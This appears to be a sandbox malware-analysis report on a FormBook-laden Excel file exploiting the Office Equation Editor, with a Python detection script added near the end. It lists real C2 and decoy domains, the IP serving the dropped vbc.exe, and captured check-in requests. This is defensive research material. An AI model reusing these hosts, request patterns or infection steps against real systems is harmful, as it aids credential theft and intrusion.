Windows Analysis Report: (RFQ) No.109050.xlsx

Overview

General Information

Sample Name: (RFQ) No.109050.xlsx
Analysis ID: 483690
MD5: 34cc835409afb805f20b811796d3b1fd
SHA1: 90b0fe9c48bb9915e2202e905baa3029ebc6f541
SHA256: bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2916 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2028 cmdline: 'C:\Users\Public\vbc.exe' MD5: A3F424F32B637CB917E6596FAE56E401)
      • vbc.exe (PID: 1292 cmdline: C:\Users\Public\vbc.exe MD5: A3F424F32B637CB917E6596FAE56E401)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3044 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 198.12.84.109, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2916, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2028
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2028

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}
Multi AV Scanner detection for submitted file
Source: (RFQ) No.109050.xlsx | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 | Avira URL Cloud: Label: malware
Source: www.afishin.com/r48a/ | Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected
Source: 7.2.vbc.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
Source: global traffic | DNS query: name: www.hansel-design.com
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi | 7_2_00415679
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 9_2_00095679
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80
Source: excel.exe | Memory has grown: Private usage: 4MB later: 69MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.corpmat.com
Source: C:\Windows\explorer.exe | Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe | Network Connect: 144.217.61.66 80
Source: C:\Windows\explorer.exe | Domain query: www.boxtobookshelf.com
Source: C:\Windows\explorer.exe | Domain query: www.hansel-design.com
Source: C:\Windows\explorer.exe | Domain query: www.aubergetoitrouge.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 75.2.89.208 80
Source: C:\Windows\explorer.exe | Domain query: www.afishin.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.afishin.com/r48a/
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | ASN Name: OVHFR
Source: global traffic | HTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.aubergetoitrouge.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.corpmat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.afishin.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1 | Host: www.boxtobookshelf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.12.84.109
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 15 Sep 2021 09:41:57 GMT | Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22 | Last-Modified: Wed, 15 Sep 2021 04:42:06 GMT | ETag: "83800-5cc0151fdab7b" | Accept-Ranges: bytes | Content-Length: 538624 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: global traffic | HTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.12.84.109 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 198.12.84.109
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: 45F1FF87.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf
Source: unknown | DNS traffic detected: queries for: www.hansel-design.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 8 | Screenshot OCR: Enable Editing from the 18 , yellow bar above 19 This document is 20 3 Once you have enabled ed
        Office equation editor drops PE file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
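        The two file-creation events above (one into the browser cache, one into C:\Users\Public) are the tail of the GET /cmd/vbc.exe request listed in the network section, issued by EQNEDT32.EXE itself. Equation Editor renders formulas: writing a PE file, opening a socket, or starting a program are each an alert on their own, and together they are the exploitation chain, whichever memory-corruption bug in the editor was used. The detector below is an added illustration, not part of the report or of any vendor's rule set: it evaluates Sysmon-style file, network and process events and aggregates them into a verdict. The events are constructed from the image names, paths and address the report lists; their order and field names are assumptions, since the report does not publish its raw telemetry.

```python
import ntpath
from collections import Counter

EQNEDT = "eqnedt32.exe"
EXEC_EXTS = {".exe", ".dll", ".scr", ".com", ".pif"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
EQ_IMAGE = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed telemetry shaped like Sysmon events (file create, network connect,
# process create). Paths, image names and the address come from the report; the
# order and the field names are assumptions.
EVENTS = [
    {"type": "FileCreate", "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf"},
    {"type": "NetworkConnect", "image": EQ_IMAGE, "dst_ip": "198.12.84.109", "dst_port": 80},
    {"type": "FileCreate", "image": EQ_IMAGE,
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"type": "FileCreate", "image": EQ_IMAGE, "target": r"C:\Users\Public\vbc.exe"},
    {"type": "ProcessCreate", "image": r"C:\Users\Public\vbc.exe", "parent_image": EQ_IMAGE},
]


def _name(path: str) -> str:
    # ntpath handles backslash paths regardless of the host OS the detector runs on.
    return ntpath.basename(path).lower()


def _user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE)


def evaluate(event: dict) -> list:
    """Return the names of the rules one event triggers. Each behaviour that the
    Equation Editor has no legitimate reason to show is a rule of its own."""
    hits = []
    kind, img = event["type"], _name(event["image"])
    if kind == "FileCreate" and img == EQNEDT:
        if ntpath.splitext(event["target"])[1].lower() in EXEC_EXTS:
            hits.append("eqnedt32_drops_executable")
            if _user_writable(event["target"]):
                hits.append("drop_in_user_writable_dir")
    elif kind == "NetworkConnect" and img == EQNEDT:
        hits.append("eqnedt32_network_connection")
    elif kind == "ProcessCreate" and _name(event["parent_image"]) == EQNEDT:
        hits.append("eqnedt32_spawns_process")
        if _user_writable(event["image"]):
            hits.append("execution_from_user_writable_dir")
    return hits


def triage(events) -> dict:
    """Aggregate per-event hits into one verdict: an executable dropped by the
    editor plus network or process activity from it is the full chain."""
    counts = Counter(hit for event in events for hit in evaluate(event))
    if "eqnedt32_drops_executable" in counts and (
            "eqnedt32_spawns_process" in counts or "eqnedt32_network_connection" in counts):
        verdict = "eqnedt32_exploitation_chain"
    elif counts:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": dict(counts), "verdict": verdict}


if __name__ == "__main__":
    result = triage(EVENTS)
    print(result["verdict"])
    for rule, count in sorted(result["hits"].items()):
        print(f"  {rule}: {count}")
```

        The EXCEL.EXE event (an .emf written to Content.MSO, as in the first line of this section) produces no hit, which is the point of keying on the Equation Editor image rather than on Office as a whole; the browser-cache copy vbc[1].exe and C:\Users\Public\vbc.exe both count as drops, and the verdict requires the drop to be followed by the network connection or the child process.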
        .NET source code contains very large strings
